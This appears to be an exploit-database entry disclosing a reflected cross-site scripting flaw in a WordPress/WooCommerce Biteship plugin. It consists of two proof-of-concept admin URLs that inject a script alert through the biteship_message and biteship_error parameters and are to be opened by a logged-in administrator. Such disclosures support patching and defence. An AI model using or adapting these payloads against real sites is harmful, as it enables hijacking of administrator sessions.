Share
## https://sploitus.com/exploit?id=WPEX-ID:DFE5001F-31B9-4DE2-A240-F7F5A992AC49
Make a logged in admin open one of the URLs below:

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_message=<script>alert(/XSS/)</script>

https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_error=<script>alert(/XSS/)</script>